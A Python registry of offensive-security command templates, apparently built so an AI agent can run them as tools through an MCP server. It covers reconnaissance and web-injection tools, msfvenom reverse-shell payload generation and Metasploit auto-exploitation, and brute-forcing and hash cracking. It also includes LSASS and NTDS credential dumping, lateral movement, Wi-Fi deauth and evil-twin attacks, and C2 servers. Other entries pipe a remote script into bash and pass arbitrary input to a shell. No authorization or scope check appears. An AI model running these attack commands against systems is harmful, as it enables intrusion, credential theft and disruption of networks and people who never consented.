"""
Offensive Security MCP Tool Registry
Daemons Zyrax — Ans Inayat
All tools are defined here with metadata, platform, command templates, and category.
"""

from dataclasses import dataclass, field
from typing import Optional

@dataclass
class OffensiveTool:
    name: str
    category: str
    platform: str          # kali | windows | both
    description: str
    command_template: str  # {target}, {port}, {wordlist}, {lhost}, {lport}, {domain}, {user}, {pass} placeholders
    args_schema: dict      # JSON-schema-like dict for required/optional args
    tags: list[str] = field(default_factory=list)
    risk_level: str = "medium"  # low | medium | high | critical
    output_parser: Optional[str] = None  # "grep_open_ports" | "json" | "raw"


TOOLS_REGISTRY: list[OffensiveTool] = [

    # ─── RECON & OSINT ───────────────────────────────────────────────────────
    OffensiveTool(
        name="nmap_basic",
        category="recon",
        platform="both",
        description="Nmap service/version scan with default scripts",
        command_template="nmap -sV -sC -T4 -p {ports} {target} -oN {output}",
        args_schema={"required": ["target"], "optional": {"ports": "1-65535", "output": "nmap_scan.txt"}},
        tags=["nmap", "port-scan", "service-detection"],
        risk_level="low",
    ),
    OffensiveTool(
        name="nmap_stealth",
        category="recon",
        platform="kali",
        description="Nmap SYN stealth scan — requires root",
        command_template="nmap -sS -sV -O -T3 -p {ports} {target} -oX {output}",
        args_schema={"required": ["target"], "optional": {"ports": "1-65535", "output": "nmap_stealth.xml"}},
        tags=["nmap", "stealth", "syn-scan"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="nmap_vuln",
        category="recon",
        platform="both",
        description="Nmap vulnerability scan using NSE vuln scripts",
        command_template="nmap --script=vuln -p {ports} {target} -oN {output}",
        args_schema={"required": ["target"], "optional": {"ports": "80,443,22,21,25,3389", "output": "nmap_vuln.txt"}},
        tags=["nmap", "vulnerability", "nse"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="masscan",
        category="recon",
        platform="kali",
        description="Masscan — ultra-fast port scanner, ideal for large /16 subnets",
        command_template="masscan -p{ports} {target} --rate={rate} -oJ {output}",
        args_schema={"required": ["target"], "optional": {"ports": "1-65535", "rate": "10000", "output": "masscan.json"}},
        tags=["masscan", "fast-scan"],
        risk_level="low",
    ),
    OffensiveTool(
        name="theHarvester",
        category="recon",
        platform="kali",
        description="OSINT harvester — emails, subdomains, IPs from public sources",
        command_template="theHarvester -d {domain} -b {sources} -l 500 -f {output}",
        args_schema={"required": ["domain"], "optional": {"sources": "google,bing,linkedin,yahoo,dnsdumpster", "output": "harvester_out"}},
        tags=["osint", "email", "subdomain"],
        risk_level="low",
    ),
    OffensiveTool(
        name="amass_enum",
        category="recon",
        platform="kali",
        description="Deep subdomain enumeration using Amass passive/active modes",
        command_template="amass enum -d {domain} -passive -o {output}",
        args_schema={"required": ["domain"], "optional": {"output": "amass_subs.txt"}},
        tags=["amass", "subdomain", "dns"],
        risk_level="low",
    ),
    OffensiveTool(
        name="subfinder",
        category="recon",
        platform="kali",
        description="Fast passive subdomain discovery via 40+ data sources",
        command_template="subfinder -d {domain} -o {output} -silent",
        args_schema={"required": ["domain"], "optional": {"output": "subfinder_subs.txt"}},
        tags=["subfinder", "subdomain"],
        risk_level="low",
    ),
    OffensiveTool(
        name="shodan_search",
        category="recon",
        platform="both",
        description="Shodan CLI — search internet-exposed services for target org",
        command_template="shodan search 'org:\"{org}\"' --fields ip_str,port,org,hostnames",
        args_schema={"required": ["org"], "optional": {}},
        tags=["shodan", "osint"],
        risk_level="low",
    ),
    OffensiveTool(
        name="whois_lookup",
        category="recon",
        platform="both",
        description="WHOIS lookup for domain registration info",
        command_template="whois {domain}",
        args_schema={"required": ["domain"], "optional": {}},
        tags=["whois", "osint"],
        risk_level="low",
    ),
    OffensiveTool(
        name="dnsx_resolve",
        category="recon",
        platform="kali",
        description="Bulk DNS resolution and record enumeration with dnsx",
        command_template="dnsx -d {domain} -a -aaaa -mx -ns -txt -silent -o {output}",
        args_schema={"required": ["domain"], "optional": {"output": "dns_records.txt"}},
        tags=["dns", "enumeration"],
        risk_level="low",
    ),

    # ─── SCANNING & ENUMERATION ──────────────────────────────────────────────
    OffensiveTool(
        name="nikto_scan",
        category="scanning",
        platform="kali",
        description="Nikto web server vulnerability scanner",
        command_template="nikto -h {target} -port {port} -output {output} -Format txt",
        args_schema={"required": ["target"], "optional": {"port": "80", "output": "nikto_out.txt"}},
        tags=["nikto", "web", "scanner"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="gobuster_dir",
        category="scanning",
        platform="kali",
        description="Directory brute-force with Gobuster",
        command_template="gobuster dir -u {url} -w {wordlist} -t {threads} -o {output} -x php,html,txt,js,json",
        args_schema={"required": ["url"], "optional": {"wordlist": "/usr/share/wordlists/dirb/common.txt", "threads": "50", "output": "gobuster_dir.txt"}},
        tags=["gobuster", "directory", "brute-force"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="gobuster_dns",
        category="scanning",
        platform="kali",
        description="DNS subdomain brute-force with Gobuster",
        command_template="gobuster dns -d {domain} -w {wordlist} -t {threads} -o {output}",
        args_schema={"required": ["domain"], "optional": {"wordlist": "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt", "threads": "50", "output": "gobuster_dns.txt"}},
        tags=["gobuster", "dns", "subdomain"],
        risk_level="low",
    ),
    OffensiveTool(
        name="feroxbuster",
        category="scanning",
        platform="kali",
        description="Recursive content discovery with Feroxbuster",
        command_template="feroxbuster -u {url} -w {wordlist} -t {threads} -o {output} --no-recursion",
        args_schema={"required": ["url"], "optional": {"wordlist": "/usr/share/wordlists/dirb/common.txt", "threads": "50", "output": "ferox_out.txt"}},
        tags=["feroxbuster", "directory", "recursive"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="ffuf_fuzz",
        category="scanning",
        platform="kali",
        description="FFUF web fuzzer — fuzz directories, parameters, headers, vhosts",
        command_template="ffuf -w {wordlist} -u {url}/FUZZ -t {threads} -mc 200,301,302,403 -o {output} -of json",
        args_schema={"required": ["url"], "optional": {"wordlist": "/usr/share/wordlists/dirb/common.txt", "threads": "50", "output": "ffuf_out.json"}},
        tags=["ffuf", "fuzzing", "web"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="nuclei_scan",
        category="scanning",
        platform="kali",
        description="Nuclei template-based vulnerability scanner — 9000+ templates",
        command_template="nuclei -u {target} -t {templates} -severity {severity} -o {output}",
        args_schema={"required": ["target"], "optional": {"templates": "cves/,misconfigurations/,exposed-panels/", "severity": "low,medium,high,critical", "output": "nuclei_out.txt"}},
        tags=["nuclei", "vulnerability", "cve"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="enum4linux",
        category="scanning",
        platform="kali",
        description="SMB/Samba enumeration — users, shares, groups, OS, password policy",
        command_template="enum4linux -a {target} | tee {output}",
        args_schema={"required": ["target"], "optional": {"output": "enum4linux_out.txt"}},
        tags=["smb", "samba", "enumeration"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="ldap_enum",
        category="scanning",
        platform="kali",
        description="LDAP enumeration of Active Directory — users, groups, computers",
        command_template="ldapsearch -H ldap://{target} -x -b 'DC={dc1},DC={dc2}' -s sub '(objectClass=*)' | tee {output}",
        args_schema={"required": ["target", "dc1", "dc2"], "optional": {"output": "ldap_enum.txt"}},
        tags=["ldap", "active-directory", "enumeration"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="whatweb",
        category="scanning",
        platform="kali",
        description="Web technology fingerprinter — CMS, framework, server",
        command_template="whatweb -v {url} | tee {output}",
        args_schema={"required": ["url"], "optional": {"output": "whatweb_out.txt"}},
        tags=["whatweb", "fingerprint"],
        risk_level="low",
    ),
    OffensiveTool(
        name="snmp_walk",
        category="scanning",
        platform="kali",
        description="SNMP walk — enumerate SNMP OIDs for device/config info",
        command_template="snmpwalk -v{version} -c {community} {target} | tee {output}",
        args_schema={"required": ["target"], "optional": {"version": "2c", "community": "public", "output": "snmpwalk_out.txt"}},
        tags=["snmp", "enumeration"],
        risk_level="low",
    ),

    # ─── WEB APPLICATION ATTACKS ─────────────────────────────────────────────
    OffensiveTool(
        name="sqlmap_basic",
        category="web",
        platform="kali",
        description="SQLMap automated SQL injection detection and exploitation",
        command_template="sqlmap -u '{url}' --dbs --batch --level={level} --risk={risk} --output-dir={output}",
        args_schema={"required": ["url"], "optional": {"level": "3", "risk": "2", "output": "sqlmap_out"}},
        tags=["sqlmap", "sqli", "injection"],
        risk_level="high",
    ),
    OffensiveTool(
        name="sqlmap_post",
        category="web",
        platform="kali",
        description="SQLMap against POST request — pass captured request file",
        command_template="sqlmap -r {request_file} --dbs --batch --level={level} --tamper={tamper}",
        args_schema={"required": ["request_file"], "optional": {"level": "3", "tamper": "space2comment,between"}},
        tags=["sqlmap", "sqli", "post"],
        risk_level="high",
    ),
    OffensiveTool(
        name="xsstrike",
        category="web",
        platform="kali",
        description="Advanced XSS detection with DOM analysis and WAF bypass payloads",
        command_template="python3 /opt/XSStrike/xsstrike.py -u '{url}' --crawl --blind",
        args_schema={"required": ["url"], "optional": {}},
        tags=["xss", "xsstrike"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="commix",
        category="web",
        platform="kali",
        description="OS command injection exploiter — auto-detect and exploit CMDi",
        command_template="commix --url='{url}' --batch --output-dir={output}",
        args_schema={"required": ["url"], "optional": {"output": "commix_out"}},
        tags=["commix", "command-injection"],
        risk_level="high",
    ),
    OffensiveTool(
        name="wfuzz_param",
        category="web",
        platform="kali",
        description="Wfuzz HTTP parameter fuzzer with filter support",
        command_template="wfuzz -w {wordlist} -u '{url}?FUZZ=test' --hc 404 -o {output}",
        args_schema={"required": ["url"], "optional": {"wordlist": "/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt", "output": "wfuzz_params.txt"}},
        tags=["wfuzz", "fuzzing", "parameters"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="jwt_tool",
        category="web",
        platform="kali",
        description="JWT attack toolkit — alg:none, RS256→HS256, secret brute-force",
        command_template="python3 /opt/jwt_tool/jwt_tool.py {token} -T -v",
        args_schema={"required": ["token"], "optional": {}},
        tags=["jwt", "authentication", "token"],
        risk_level="high",
    ),
    OffensiveTool(
        name="cors_scan",
        category="web",
        platform="kali",
        description="CORS misconfiguration scanner",
        command_template="python3 /opt/CORScanner/cors_scan.py -u {url} -v",
        args_schema={"required": ["url"], "optional": {}},
        tags=["cors", "misconfiguration"],
        risk_level="medium",
    ),

    # ─── EXPLOITATION ─────────────────────────────────────────────────────────
    OffensiveTool(
        name="msfconsole_launch",
        category="exploitation",
        platform="both",
        description="Launch Metasploit Framework console (interactive)",
        command_template="msfconsole -x 'use {module}; set RHOSTS {target}; set LHOST {lhost}; set LPORT {lport}; run'",
        args_schema={"required": ["module", "target", "lhost", "lport"], "optional": {}},
        tags=["metasploit", "exploit"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="searchsploit",
        category="exploitation",
        platform="kali",
        description="Search Exploit-DB offline for public exploits matching software+version",
        command_template="searchsploit '{query}' --www",
        args_schema={"required": ["query"], "optional": {}},
        tags=["searchsploit", "exploit-db"],
        risk_level="low",
    ),
    OffensiveTool(
        name="msfvenom_exe",
        category="exploitation",
        platform="both",
        description="Msfvenom — generate Windows x64 reverse TCP Meterpreter EXE",
        command_template="msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f exe -e x64/xor_dynamic -i 5 -o {output}",
        args_schema={"required": ["lhost", "lport"], "optional": {"output": "payload.exe"}},
        tags=["msfvenom", "payload", "windows"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="msfvenom_elf",
        category="exploitation",
        platform="kali",
        description="Msfvenom — generate Linux reverse TCP ELF payload",
        command_template="msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f elf -o {output}",
        args_schema={"required": ["lhost", "lport"], "optional": {"output": "payload.elf"}},
        tags=["msfvenom", "payload", "linux"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="msfvenom_php",
        category="exploitation",
        platform="both",
        description="Msfvenom — generate PHP reverse shell payload",
        command_template="msfvenom -p php/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f raw -o {output}",
        args_schema={"required": ["lhost", "lport"], "optional": {"output": "shell.php"}},
        tags=["msfvenom", "payload", "php", "web"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="msfvenom_ps1",
        category="exploitation",
        platform="both",
        description="Msfvenom — generate PowerShell reverse shell payload",
        command_template="msfvenom -p cmd/windows/reverse_powershell LHOST={lhost} LPORT={lport} -f raw -o {output}",
        args_schema={"required": ["lhost", "lport"], "optional": {"output": "shell.ps1"}},
        tags=["msfvenom", "payload", "powershell"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="nc_listener",
        category="exploitation",
        platform="both",
        description="Netcat reverse shell listener",
        command_template="nc -lvnp {lport}",
        args_schema={"required": ["lport"], "optional": {}},
        tags=["netcat", "listener", "reverse-shell"],
        risk_level="medium",
    ),

    # ─── PASSWORD ATTACKS ─────────────────────────────────────────────────────
    OffensiveTool(
        name="hydra_ssh",
        category="password",
        platform="kali",
        description="Hydra SSH brute-force attack",
        command_template="hydra -l {user} -P {wordlist} ssh://{target}:{port} -t {threads} -o {output}",
        args_schema={"required": ["target"], "optional": {"user": "root", "wordlist": "/usr/share/wordlists/rockyou.txt", "port": "22", "threads": "16", "output": "hydra_ssh.txt"}},
        tags=["hydra", "brute-force", "ssh"],
        risk_level="high",
    ),
    OffensiveTool(
        name="hydra_http",
        category="password",
        platform="kali",
        description="Hydra HTTP-POST form brute-force",
        command_template="hydra -l {user} -P {wordlist} {target} http-post-form '{form_path}:{form_data}:{fail_string}' -o {output}",
        args_schema={"required": ["target", "form_path", "form_data", "fail_string"], "optional": {"user": "admin", "wordlist": "/usr/share/wordlists/rockyou.txt", "output": "hydra_http.txt"}},
        tags=["hydra", "brute-force", "http"],
        risk_level="high",
    ),
    OffensiveTool(
        name="hashcat_md5",
        category="password",
        platform="both",
        description="Hashcat MD5 wordlist crack (-m 0)",
        command_template="hashcat -m 0 -a 0 {hashfile} {wordlist} --show -o {output}",
        args_schema={"required": ["hashfile"], "optional": {"wordlist": "/usr/share/wordlists/rockyou.txt", "output": "cracked.txt"}},
        tags=["hashcat", "cracking", "md5"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="hashcat_ntlm",
        category="password",
        platform="both",
        description="Hashcat NTLM hash cracking (-m 1000)",
        command_template="hashcat -m 1000 -a 0 {hashfile} {wordlist} --show -o {output}",
        args_schema={"required": ["hashfile"], "optional": {"wordlist": "/usr/share/wordlists/rockyou.txt", "output": "cracked_ntlm.txt"}},
        tags=["hashcat", "cracking", "ntlm", "windows"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="hashcat_bcrypt",
        category="password",
        platform="both",
        description="Hashcat bcrypt hash cracking (-m 3200)",
        command_template="hashcat -m 3200 -a 0 {hashfile} {wordlist} --show -o {output}",
        args_schema={"required": ["hashfile"], "optional": {"wordlist": "/usr/share/wordlists/rockyou.txt", "output": "cracked_bcrypt.txt"}},
        tags=["hashcat", "cracking", "bcrypt"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="john_crack",
        category="password",
        platform="kali",
        description="John the Ripper — auto-detect hash and crack",
        command_template="john {hashfile} --wordlist={wordlist} --format={format} --fork={threads}",
        args_schema={"required": ["hashfile"], "optional": {"wordlist": "/usr/share/wordlists/rockyou.txt", "format": "auto", "threads": "4"}},
        tags=["john", "cracking"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="crackmapexec_smb",
        category="password",
        platform="kali",
        description="CrackMapExec SMB password spray and share enumeration",
        command_template="cme smb {target} -u {userfile} -p {passfile} --continue-on-success | tee {output}",
        args_schema={"required": ["target"], "optional": {"userfile": "users.txt", "passfile": "passwords.txt", "output": "cme_smb.txt"}},
        tags=["crackmapexec", "smb", "password-spray"],
        risk_level="high",
    ),
    OffensiveTool(
        name="responder",
        category="password",
        platform="kali",
        description="Responder — LLMNR/NBT-NS/MDNS poisoner, captures NTLMv2 hashes",
        command_template="responder -I {interface} -rdw -v | tee {output}",
        args_schema={"required": ["interface"], "optional": {"output": "responder_hashes.txt"}},
        tags=["responder", "llmnr", "ntlm", "poisoning"],
        risk_level="high",
    ),
    OffensiveTool(
        name="impacket_secretsdump",
        category="password",
        platform="kali",
        description="Impacket secretsdump — dump SAM/LSA/NTDS.dit remotely",
        command_template="impacket-secretsdump '{domain}/{user}:{password}@{target}' -outputfile {output}",
        args_schema={"required": ["target", "user", "password"], "optional": {"domain": ".", "output": "secrets_dump"}},
        tags=["impacket", "secretsdump", "credentials", "dcsync"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="kerbrute_userenum",
        category="password",
        platform="both",
        description="Kerbrute — Kerberos user enumeration and AS-REP roast",
        command_template="kerbrute userenum {userlist} -d {domain} --dc {dc} -o {output}",
        args_schema={"required": ["domain", "dc"], "optional": {"userlist": "users.txt", "output": "kerbrute_out.txt"}},
        tags=["kerbrute", "kerberos", "enumeration"],
        risk_level="medium",
    ),

    # ─── POST-EXPLOITATION ────────────────────────────────────────────────────
    OffensiveTool(
        name="linpeas",
        category="post",
        platform="kali",
        description="LinPEAS — Linux privilege escalation enumeration script",
        command_template="curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash | tee {output}",
        args_schema={"required": [], "optional": {"output": "linpeas_out.txt"}},
        tags=["linpeas", "privesc", "linux"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="winpeas",
        category="post",
        platform="windows",
        description="WinPEAS — Windows privilege escalation checker",
        command_template="winpeas.exe all | Tee-Object -FilePath {output}",
        args_schema={"required": [], "optional": {"output": "winpeas_out.txt"}},
        tags=["winpeas", "privesc", "windows"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="evil_winrm",
        category="post",
        platform="kali",
        description="Evil-WinRM — Windows Remote Management shell with upload/download",
        command_template="evil-winrm -i {target} -u {user} -p '{password}' -s {scripts_path}",
        args_schema={"required": ["target", "user", "password"], "optional": {"scripts_path": "/opt/privesc/"}},
        tags=["evil-winrm", "winrm", "remote-shell"],
        risk_level="high",
    ),
    OffensiveTool(
        name="chisel_server",
        category="post",
        platform="both",
        description="Chisel reverse tunnel server for SOCKS5 pivoting",
        command_template="chisel server -p {port} --reverse --socks5",
        args_schema={"required": [], "optional": {"port": "8080"}},
        tags=["chisel", "tunneling", "pivoting", "socks5"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="chisel_client",
        category="post",
        platform="both",
        description="Chisel client — connect to server and create reverse SOCKS5 proxy",
        command_template="chisel client {server_ip}:{server_port} R:socks",
        args_schema={"required": ["server_ip"], "optional": {"server_port": "8080"}},
        tags=["chisel", "tunneling", "pivoting"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="ligolo_proxy",
        category="post",
        platform="both",
        description="Ligolo-ng proxy server — transparent network pivoting via TUN interface",
        command_template="./proxy -selfcert -laddr {listen_addr}",
        args_schema={"required": [], "optional": {"listen_addr": "0.0.0.0:11601"}},
        tags=["ligolo", "pivoting", "tunneling"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="proxychains_exec",
        category="post",
        platform="kali",
        description="Route arbitrary command through proxychains SOCKS proxy",
        # Use a shell wrapper so operators can pass pipes, redirects, &&, etc.
        command_template="proxychains4 -q bash -lc {command}",
        args_schema={"required": ["command"], "optional": {}},
        tags=["proxychains", "pivoting"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="mimikatz_logonpasswords",
        category="post",
        platform="windows",
        description="Mimikatz — dump plaintext credentials from LSASS",
        command_template='mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"',
        args_schema={"required": [], "optional": {}},
        tags=["mimikatz", "credentials", "lsass", "windows"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="bloodhound_collect",
        category="post",
        platform="both",
        description="SharpHound/BloodHound.py data collection from AD environment",
        # bloodhound-python uses `-dc` (single dash), not `--dc`.
        command_template="bloodhound-python -u {user} -p '{password}' -d {domain} -c All -dc {dc} -o {output}",
        args_schema={"required": ["user", "password", "domain", "dc"], "optional": {"output": "bloodhound_data/"}},
        tags=["bloodhound", "active-directory", "attack-path"],
        risk_level="high",
    ),

    # ─── WIRELESS ─────────────────────────────────────────────────────────────
    OffensiveTool(
        name="airmon_start",
        category="wireless",
        platform="kali",
        description="Enable monitor mode on wireless interface",
        command_template="airmon-ng start {interface}",
        args_schema={"required": ["interface"], "optional": {}},
        tags=["airmon", "monitor-mode", "wireless"],
        risk_level="low",
    ),
    OffensiveTool(
        name="airodump_scan",
        category="wireless",
        platform="kali",
        description="Airodump-ng — scan all APs and clients on all channels",
        command_template="airodump-ng {interface} -w {output} --write-interval 1",
        args_schema={"required": ["interface"], "optional": {"output": "airodump_scan"}},
        tags=["airodump", "wireless", "ap-scan"],
        risk_level="low",
    ),
    OffensiveTool(
        name="airodump_capture",
        category="wireless",
        platform="kali",
        description="Airodump-ng — capture WPA2 handshake for specific BSSID",
        command_template="airodump-ng -c {channel} --bssid {bssid} -w {output} {interface}",
        args_schema={"required": ["interface", "bssid", "channel"], "optional": {"output": "handshake_capture"}},
        tags=["airodump", "handshake", "wpa2"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="aireplay_deauth",
        category="wireless",
        platform="kali",
        description="Aireplay-ng deauth attack — force client reconnect for handshake capture",
        command_template="aireplay-ng -0 {count} -a {bssid} -c {client_mac} {interface}",
        args_schema={"required": ["interface", "bssid"], "optional": {"count": "5", "client_mac": "FF:FF:FF:FF:FF:FF"}},
        tags=["aireplay", "deauth", "wireless"],
        risk_level="high",
    ),
    OffensiveTool(
        name="aircrack_wpa",
        category="wireless",
        platform="kali",
        description="Aircrack-ng WPA/WPA2 handshake cracking with wordlist",
        command_template="aircrack-ng {capture_file} -w {wordlist} -e '{essid}'",
        args_schema={"required": ["capture_file", "essid"], "optional": {"wordlist": "/usr/share/wordlists/rockyou.txt"}},
        tags=["aircrack", "wpa", "cracking", "wireless"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="eaphammer",
        category="wireless",
        platform="kali",
        description="EAPHammer — evil twin WPA2-Enterprise attack for PEAP/EAP-TTLS creds",
        command_template="python eaphammer --bssid {bssid} --essid '{essid}' --channel {channel} --wpa2-eap --negotiate balanced --auth {auth_type}",
        args_schema={"required": ["bssid", "essid", "channel"], "optional": {"auth_type": "peap"}},
        tags=["eaphammer", "wpa-enterprise", "evil-twin"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="hcxdumptool_pmkid",
        category="wireless",
        platform="kali",
        description="hcxdumptool — passive PMKID capture without deauth",
        command_template="hcxdumptool -i {interface} -o {output} --enable_status=3 --filterlist_ap={filterlist} --filtermode=2",
        args_schema={"required": ["interface"], "optional": {"output": "pmkid_capture.pcapng", "filterlist": "targets.txt"}},
        tags=["hcxdumptool", "pmkid", "passive"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="hcxtools_convert",
        category="wireless",
        platform="kali",
        description="hcxpcapngtool — convert captured PMKID/handshake to hashcat format",
        command_template="hcxpcapngtool {capture_file} -o {output}",
        args_schema={"required": ["capture_file"], "optional": {"output": "hashes.hc22000"}},
        tags=["hcxtools", "convert", "hashcat"],
        risk_level="low",
    ),
    OffensiveTool(
        name="wifite",
        category="wireless",
        platform="kali",
        description="Wifite — automated wireless auditor (WEP/WPA/WPS/PMKID)",
        command_template="wifite --kill --wpa --pmkid --timeout {timeout} --dict {wordlist}",
        args_schema={"required": [], "optional": {"timeout": "60", "wordlist": "/usr/share/wordlists/rockyou.txt"}},
        tags=["wifite", "wireless", "automated"],
        risk_level="high",
    ),

    # ─── WINDOWS-SPECIFIC ─────────────────────────────────────────────────────
    OffensiveTool(
        name="rubeus_kerberoast",
        category="windows",
        platform="windows",
        description="Rubeus — Kerberoasting service account hashes",
        command_template="Rubeus.exe kerberoast /outfile:{output} /format:hashcat",
        args_schema={"required": [], "optional": {"output": "kerberoast_hashes.txt"}},
        tags=["rubeus", "kerberoast", "kerberos"],
        risk_level="high",
    ),
    OffensiveTool(
        name="rubeus_asreproast",
        category="windows",
        platform="windows",
        description="Rubeus — AS-REP roasting for accounts with pre-auth disabled",
        command_template="Rubeus.exe asreproast /outfile:{output} /format:hashcat",
        args_schema={"required": [], "optional": {"output": "asrep_hashes.txt"}},
        tags=["rubeus", "asreproast", "kerberos"],
        risk_level="high",
    ),
    OffensiveTool(
        name="powerview_users",
        category="windows",
        platform="windows",
        description="PowerView — enumerate domain users and SPN accounts",
        command_template="powershell -ep bypass -c \"Import-Module PowerView.ps1; Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname | Export-Csv {output}\"",
        args_schema={"required": [], "optional": {"output": "domain_spn_users.csv"}},
        tags=["powerview", "active-directory", "spn"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="powerview_acl",
        category="windows",
        platform="windows",
        description="PowerView — find dangerous ACL misconfigurations (GenericAll, WriteDACL)",
        command_template="powershell -ep bypass -c \"Import-Module PowerView.ps1; Find-InterestingDomainAcl -ResolveGUIDs | Export-Csv {output}\"",
        args_schema={"required": [], "optional": {"output": "dangerous_acls.csv"}},
        tags=["powerview", "acl", "active-directory"],
        risk_level="high",
    ),
    OffensiveTool(
        name="seatbelt_audit",
        category="windows",
        platform="windows",
        description="Seatbelt — host situational awareness, 50+ security checks",
        command_template="Seatbelt.exe -group=all -outputfile={output}",
        args_schema={"required": [], "optional": {"output": "seatbelt_audit.txt"}},
        tags=["seatbelt", "enumeration", "windows"],
        risk_level="low",
    ),
    OffensiveTool(
        name="sharpup",
        category="windows",
        platform="windows",
        description="SharpUp — Windows privilege escalation checks",
        command_template="SharpUp.exe audit",
        args_schema={"required": [], "optional": {}},
        tags=["sharpup", "privesc", "windows"],
        risk_level="medium",
    ),
    OffensiveTool(
        name="psexec_lateral",
        category="windows",
        platform="both",
        description="Impacket PsExec — remote command execution over SMB",
        command_template="impacket-psexec '{domain}/{user}:{password}@{target}' {command}",
        args_schema={"required": ["target", "user", "password"], "optional": {"domain": ".", "command": "cmd.exe"}},
        tags=["psexec", "lateral-movement", "smb"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="wmiexec",
        category="windows",
        platform="both",
        description="Impacket WMIExec — stealthy lateral movement via WMI",
        command_template="impacket-wmiexec '{domain}/{user}:{password}@{target}'",
        args_schema={"required": ["target", "user", "password"], "optional": {"domain": "."}},
        tags=["wmiexec", "lateral-movement", "wmi"],
        risk_level="critical",
    ),

    # ─── C2 FRAMEWORKS ────────────────────────────────────────────────────────
    OffensiveTool(
        name="sliver_server",
        category="c2",
        platform="both",
        description="Sliver C2 — start server (mTLS, WireGuard, HTTP/S implants)",
        command_template="./sliver-server daemon -l {listen_addr}",
        args_schema={"required": [], "optional": {"listen_addr": "0.0.0.0:31337"}},
        tags=["sliver", "c2"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="havoc_server",
        category="c2",
        platform="both",
        description="Havoc C2 — start Havoc teamserver with profile",
        command_template="./havoc server --profile {profile} --default",
        args_schema={"required": [], "optional": {"profile": "profiles/havoc.yaotl"}},
        tags=["havoc", "c2"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="mythic_start",
        category="c2",
        platform="both",
        description="Mythic C2 — start all Mythic containers",
        command_template="./mythic-cli start",
        args_schema={"required": [], "optional": {}},
        tags=["mythic", "c2"],
        risk_level="critical",
    ),
    OffensiveTool(
        name="empire_server",
        category="c2",
        platform="both",
        description="PowerShell Empire C2 — start REST server with RESTful API",
        command_template="./empire --rest --username {user} --password {password}",
        args_schema={"required": [], "optional": {"user": "empireadmin", "password": "Password123"}},
        tags=["empire", "powershell", "c2"],
        risk_level="critical",
    ),
]

TOOLS_BY_NAME: dict[str, OffensiveTool] = {t.name: t for t in TOOLS_REGISTRY}
TOOLS_BY_CATEGORY: dict[str, list[OffensiveTool]] = {}
for tool in TOOLS_REGISTRY:
    TOOLS_BY_CATEGORY.setdefault(tool.category, []).append(tool)
